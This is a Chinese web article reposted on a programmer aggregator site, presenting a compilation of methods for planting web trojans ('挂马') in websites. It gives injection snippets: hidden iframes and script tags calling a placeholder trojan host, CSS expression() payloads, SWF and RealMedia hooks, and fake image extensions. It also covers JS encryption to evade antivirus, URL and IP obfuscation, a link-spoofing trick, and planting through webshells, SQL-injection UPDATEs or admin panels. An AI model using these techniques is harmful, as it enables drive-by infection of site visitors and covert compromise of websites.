网页挂马方法和技巧大汇总 程序员文章站 2022-07-03 10:47:03 1,挂马的N种方法 (1) HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句,像</if... 09-06-03...</div> <div class="content"> <strong>1,挂马的n种方法 <br></strong> <strong>(1) html挂马法。</strong> <br> 常规的html挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。 <br> <strong>(2) 再隐藏一点的就是js挂马了。 <br></strong> 像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>,horse里的js写法一般为 document.write(’http:\/\/www.xxx.com\/horse.html’>;,或者专业一点的写法是 top.document.body.innerhtml = top.document.body.innerhtml + ‘\r\n<inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不过第2种写法要注意:是原来的网页种要有body标签。 <br><strong> (3) 在 css中挂马</strong>。 <br> 这个方法就是在css中写入: <br> body { <br>hytop:expression(top.document.body.innerhtml = top.document.body.innerhtml + ‘\r\n<iframe src=”http://www.xxx.com/horse.html/”></iframe>’); <br>} <br> 然后在主页中调用这个css,代码类似 这样的。在csdn 中对expression的解释是:ie5及其以后版本支持在css中使用expression,用来吧css属性和javascript表达式关联起来,这里的css属性可以是元素固有的属性,也可以是自定义属性。也就是说css属性后面可以是一段javasccript表达式,css属性的值等于 javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法,也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句,所以我们可用于挂马。不过写的语句值可以远程调用,本地不可以。 <br><strong> (4) 在swf中挂马 <br></strong> 网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。在网页中插入swf的语法一般格式为: <br> <object classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 width=760 name=quality value=high> <embed src=”http://www.7747.net/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?p1_prod_version=shockwaveflash type=application/x-shockwave-flash width=760 height=60></embed></object> <br><strong> (5) 在影音文件中挂马 <br></strong> 所需工具是realmedia editor,打开工具后,然后依次选择“文件”-“打开real媒体文件”,然后选择需要编辑的视频文件,其格式必须是realone公司的以rm或 rmvb为扩展名的文件。接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal&&http://www.xxx.com/horse.htm <br> (00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的url地址就是连接指定的木马地址。) <br> 输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。当合并完成后,依次选择“文本”-“real文件另存为”,保存好即可。 <br> 最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。 <br><strong> 2,挂马的技巧</strong> <br> 挂马首先要求的是隐蔽性,这样挂的时间才能长。像在swf、js、rm中挂马就是比较隐蔽了,但是还可再用到些技巧。 <br><strong> (1)远程任意后缀执行html <br></strong> 可以把horse.html成horse.jpg之类的后缀,然后语句写成<iframe src=/uploadfile/200902/20090220105353594.jpg width=0 height=0></iframe>。js也可以,语句为<script src=/uploadfile/200902/20090220105353594.jpg></script>,甚至js的不要后缀名都可以。 <br><strong> (2)js的加密</strong> <br> 为了保护网页木马的代码,可以把js内容加密,还能躲开杀软的作用。如果使用encode加密方式,加密后的js调用语句就用。除此方法外,还有其它更多的方法! <br> (3)url的变形 <br> url的变形方法也有很多,例如将url的16进制转换为encod编码等。如果是涉及到url欺骗的方法就更多了,不过多数的url欺骗,像利用@的技巧,ie都已经打补丁了。但现在有个漏洞仍然有效,代码如下: <br> <a id=”czy” href=”http://www.baidu.com”></a> <br> <div> <br> <a href=”http://www.google.cn” target=”_blank”> <br> <table> <br> <caption> <br> <a href=”http://www.google.cn” target=”_blank”> <br> <label for=”czy”> <br> <u style=”cursor: pointer: color: blue”> <br> google</u> <br> </label></a></caption></table></a></div> <br> 保存该代码为网页后,鼠标移动到google这个链接上时,ie状态栏显示的是http://www.google.cn,但点击链接后却打开http: //www.baidu.com网站。如果你的网马可以用ip地址访问到的话,ip地址也可以进行转换的。像127.0.0.1这样的ip还可以变为 2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等,这只不过是8进制、10进制、16进制、的转换而已。 <br><strong> 3,如何才能挂到马 <br></strong> 拿到了webshell的话,挂马自然是很简单了。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。 <div class="clearfix"> <span id="art_bot" class="jbtestpos"></span> </div> </div> <div class="info-pre-next"> <p> 上一篇: <a href="/article/1620510.html"> Fireworks鼠绘人物教程:绘制真实的性感CG美女 </a> </p> <p> 下一篇: <a href="/article/1620512.html"> cad旋转参照怎么用? cad线条进行参照旋转的教程 </a> </p> </div> <div class="wz_tuijian"> <p> 推荐阅读 </p> <ul> <li> <a href="/article/1620511.html" target="_blank" title="网页挂马方法和技巧大汇总"> <h2> 网页挂马方法和技巧大汇总 </h2> </a> </li> <li> <a href="/article/160210.html" target="_blank" title="网页挂马方法和技巧大汇总"> <h2> 网页挂马方法和技巧大汇总 </h2> </a> </li> </ul> </div> </article> </div> </main> <footer><div class="box"><div class="ft_nav"><div class="ft_about"><p>关于网站</p><ul><li><a href="/sitemap.xml" target="_blank" title="网站地图">网站地图</a></li><li><a href="/list/2/" title="最新程序员文章站">最新程序员文章站</a></li></ul></div><div class="ft_contact"><ul><li>本站所有数据收集于网络如有侵犯到您的权益,请联系我们进行下架处理。</li><li class="email_show"></li></ul></div></div><div class="copyright"><div class="cr_left"><p> 备案号:<a href="https://beian.miit.gov.cn/#/Integrated/index" target="_blank">粤ICP备20058927号</a></p><p>© Copyright © 2020-2022 www.superweb999.com 程序员文章站. </p></div></div></div></footer> </body> </html>